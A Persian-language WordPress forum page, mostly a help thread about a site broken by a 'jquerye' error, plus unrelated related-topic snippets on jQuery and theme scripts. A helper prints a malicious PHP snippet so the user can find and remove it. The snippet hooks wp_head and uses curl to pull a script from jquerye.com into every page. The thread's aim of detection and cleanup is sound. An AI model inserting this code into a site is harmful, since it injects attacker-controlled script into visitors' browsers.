• اطلاعیه ها

• Saeed Fard

پوشش زنده وردکمپ ۲۰۱۸ اروپا توسط وردپرس پارسی   23/03/97

اگر کاربر وردپرس هستید حتما تا به حال اسم وردکمپ رو شنیدید، کمپ و دورهمی بزرگ توسعه‌دهنده‌ها و کاربران وردپرس که سالانه در کشورهای مختلف برگزار میشه تحت عنوان وردکمپ هستش که از سمت مراجع اصلی وردپرس حمایت و برگزار می‌شه.   این‌ بار در سال 2018 وردکمپ اروپا در شهر بلگراد کشور صربستان در حال برگزاری هستش، این رویداد طی سه روز 24 تا 26 تیر ماه (June 14-16) برگزار میشه، در این رویداد مصطفی صوفی از وردپرس پارسی و به نمایندگی تمامی کاربران وردپرس فارسی حضور داره. وردپرس پارسی رویداد وردکمپ 2018 اروپا رو به صورت زنده توسط مصطفی پوشش می‌ده و در صورت علاقه‌مندی به این مراسم می‌تونید از طریق وردپرس پارسی دنبالش کنید.در حال حاضر یک روز از این مراسم گذشته که گزارش اون در قسمت پوشش زنده قرار گرفته. برای دنبال کردن مراسم وردکمپ اروپا به صورت لحظه‌ای به صفحه پوشش زنده در قسمت زیر مراجعه کنید. همینطور در آینده منتظر خبر برگزاری اولین وردکمپ در ایران توسط وردپرس‌پارسی باشید. https://wp-parsi.com/wceu-2018

لینک خبر در وردپرس پارسی : https://wp-parsi.com/wceu-2018-live  
milad.arch84

ارور jquerye در سایت و بهم ریختن تمامی سایت

7 پست در این موضوع قرار دارد

با سلام

من 2 روزه که با این مشکل مواجه شدم

هیچ افزونه ای جدیدا اضافه نکردم ، و تا چند روز پیش همه چی درست کار می کرد ، ولی الان بالای صفحه ارور نشون می ده ، و فونت ها و رنگ ها هم بهم ریخته

با سرور هم تماس گرفتم و گفتند مشکل از طرف هاست نیست

ممنون می شم کمکم کنید

http://achromatopsy.com/

0

به اشتراک گذاری این پست

لینک به پست

وردپرس رو هم آپدیت نکردید؟

0

به اشتراک گذاری این پست

لینک به پست

نه ، من 10 روز بود که هیچ تغییری نداده بودم ، و تو این مدت درست کار می کرد . ولی بدون هیچ دلیلی الان دو روزه که این پیغام رو نشون می ده و قالب بهم ریخته

0

به اشتراک گذاری این پست

لینک به پست

بدافزار روی پوسته/سایت شما وجود داره.

توی کدهای سایتتون جستجو کنید و کد زیر رو حذف کنید:

<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

اگر نبود بدنبال کد زیر باشید:

add_action('wp_head', 'insert_jquery_slider')

2

به اشتراک گذاری این پست

لینک به پست

ممنون ، ولی همه جا رو سرچ کردم ، ولی همچین کدی و یا نزدیک به این هم پیدا نکردم .

ممکنه کد دیگه ای باشه؟

0

به اشتراک گذاری این پست

لینک به پست

من شروع کردم همه افزونه هامو غیر فعال کردم . و الان افزونه Uber Audio رو غیر فعال کردم و درست شد

من این افزونه رو 1 ماه پیش نصب کرده بودم ، ومشکلی نداده بود . نمی دونم چرا باعث این مسئله شده

ممنون اقای مرتضی ، می شه بگید چطور می تونم از این بدافزار ها جلوگیری کنم ؟

0

به اشتراک گذاری این پست

لینک به پست

پلاگین هاتون رو تاجایی که شده از مخزن وردپرس دریافت کنید. سرچی که من کردم ، این پلاگین در مخزن وردپرس نبود. میتونه یکی از دلایل باشه.

البته بعضی اوقات برخی پلاگین ها با هم و با یک سری توابع قالب مشکل ساز میشن.

4

به اشتراک گذاری این پست

لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

• مطالب مشابه

• توسط mamadja
      سلام خدمت مهندسین گرامی
      بنده یه پوسته HTML دارم که قصد دارم پله به پله خودم اون رو تبدیل به یک پوسته وردپرسی کنم . این پوسته ای رو که دانلود کردم به قسمت فراخوانی اسکریپت ها رسیدم طبق آموزش هایی که دیدم و کارایی که انجام دادم درست اسکریپت های مورد نظر فراخوانی نمیشن ، یعنی مطابق فایل Html که دانلود کردم نیستند . حتی فایل function.php رو هم درست کردم و تغییرات لازم را انجام دادم اما متاسفانه نتونستم ... 
      فایل ها رو آپلود میکنم تا اونجایی که پیش رفتم . هم فایل اصلی HTML هم پوشه Theme که دارم وردپرسش میکنم اگر کسی میتونه کمکم کنه و اسکریپت ها رو فراخوانی کنه ممنون میشم .
      *بنده در نظر دارم این پوسته رو تبدیل به یک پوسته وردپرسی فروش گیفت کارت تبدیل کنم و در نهایت با استفاده از ووکامرس یک فروشگاه تبدیل بشه .. اگه اساتید نظری در این رابطه دارن که این پوسته اصلا به درد همچین کاری میخوره یا نه راهنمایی کنه ممنون میشم .. ( قرار نیست آنلاین شه و بالا بیاد جهت آموزش خودم هدف گذاری کردم )
      سپاس
      Gifti.rar
      gift-wp.rar
    • توسط Monica
      باسلام ، ی select option دارم
      من میخوام با jQuery ترجیحا ajax بتونم طبق انتخاب کاربر بخش مربوطه رو نمایش بدم
      کدهای منو ببینید 
      // صفحه اصلی index.php <script> jQuery(document).ready(function($) { jQuery('#select123').change(function() { jQuery('.content123').hide(); jQuery('#' + jQuery(this).val()).show(); }).trigger("change"); }); </script> <select id="select123">  <option value="content1" selected>content1</option> <option value="content2">content2</option> <option value="content3">content3</option> <option value="content4">content4</option> </select> * توجه: میخوام وقتی صفحه بالا ران میشه text defult show بطور پیش فرض نمایش داده بشه
      صفحه my-page.php
      //my-page.php <div id="content1" class="content123"> text defult show </div> <div id="content2" class="content123"> contentttttttt </div> <div id="content3" class="content123"> content3 </div> <div id="content4" class="content123"> content4 </div>  
    • توسط Monica
      من یک سلکت آپشن برای نمایش جدول دارم که میخوام آپشن هام دوتا بشه.
      سلکت آپشن من اینه:
      <select id="select123">  <option value="content1">جدول قیمت</option>  <option value="content2">جدول دلار</option> </select> <div id="content1" class="content123">  نمایش جدول قیمت </div> <div id="content2" class="content123">  نمایش جدول دلار </div> Script: jQuery(document).ready(function($) { jQuery('#select123').change(function() { jQuery('.content123').hide(); jQuery('#' + jQuery(this).val()).show(); }).trigger("change"); }); Css: div.content123 { display: none } دو جدول قیمت و جدول دلار . میخوام به هر کدوم ی آپشن اضافه شه ، مثلا آپشن دوم جدول قیمت بشه دیروز - امروز 
      جدول آپشن قیمت دلار بشه هفته گذشته - قیمت روز
      یعنی کاربر وقتی میزنه جدول دلار بعد در آپشن دوم انتخاب کنه هفته گذشته ، یا روز 
      چطوری میشه کدهام؟
      ممنونم از دوستانی که کمک میکنن
    • توسط koolfayfer
      سلام و وقت بخیر
      من برای سایتم از این استفاده کردم که کارش یه پروگرس بار لودینگ به همراه ایجکس کردن صفحه است
      لودینگش اجرا میشه اما ایجکسش کار نمیکنه
      برای این که متوجه بشید دو سایت زیر رو بررسی کنید
      نمونه صحیح:
      http://zakerin.ir

نمونه شبیه چیزی که من به اون رسیدم:
      https://zhaket.com
      (چیزی که اشتباهه اینه که صفحه لود میشه و سفید میره و میاد بعدش پروگرس اجرا میشه که اصولا نباید صفحه رفرش بشه)

دوستان لطفا کمک کنند
    • توسط unid_user
      سلام
      به کمکتون نیاز دارم.
      به مشکل خوردم برای اضافه کردن یک فایل جاوا اسکریپت برای ایجاد اسلاید شو (owl-carousel) در تم وردپرس.
      این تم html بوده که درحال تبدیل اون به تم وردپرس هستم.
      کد جاوااسکریپت: این کد رو کجا باید قرار بدم که مشکل اسلایدشو حل بشه؟
      <script> // You can also use "$(window).load(function() {" $(function () { // Slideshow $("#slider").responsiveSlides({ auto: true, pager: false, nav: true, speed: 500, namespace: "callbacks", before: function () { $('.events').append("<li>before event fired.</li>"); }, after: function () { $('.events').append("<li>after event fired.</li>"); } }); }); </script> آدرس دهی در فانکشن وارد کردم: این درسته که میتونم کدهای جاوا اسکریپت و توی فوتر قرار بدم و بعد از طریق فانکشن یا حالا هر روش دیگه ای اونا رو فراخونی کنم که دیگه همچین مشکلی پیش نیاد؟
      <?php function insert_style() { wp_enqueue_style('zerogrid' , get_template_directory_uri().'/assets/css/zerogrid.css'); wp_enqueue_style('style' , get_template_directory_uri().'/assets/css/style.css'); wp_enqueue_style('responsiveslides' , get_template_directory_uri().'/assets/css/responsiveslides.css'); wp_enqueue_style('font-awesome-min' , get_template_directory_uri().'/assets/font-awesome/css/font-awesome.min.css'); wp_enqueue_style('owl-carousel' , get_template_directory_uri().'/assets/owl-carousel/owl.carousel.css'); wp_enqueue_style('owl-theme' , get_template_directory_uri().'/assets/owl-carousel/owl.theme.css'); wp_enqueue_style('menu' , get_template_directory_uri().'/assets/css/menu.css'); //add scripts wp_enqueue_script('jquery183-min' , get_template_directory_uri().'/assets/js/jquery183.min.js'); wp_enqueue_script('script' , get_template_directory_uri().'/assets/js/script.js'); wp_enqueue_script('jquery-latest-min' , get_template_directory_uri().'/assets/js/jquery-latest.min.js'); wp_enqueue_script('responsiveslides-min' , get_template_directory_uri().'/assets/js/responsiveslides-min.js'); wp_enqueue_script('owl-carousel-min' , get_template_directory_uri().'/assets/owl-carousel/owl.carousel.min.js'); } add_action('wp_enqueue_scripts' , 'insert_style'); ?> خطایی که با بررسی inspect element متوجه شدم اینه که اصلا فایل owl-carousel.js خونده نمیشه.
      ممنون.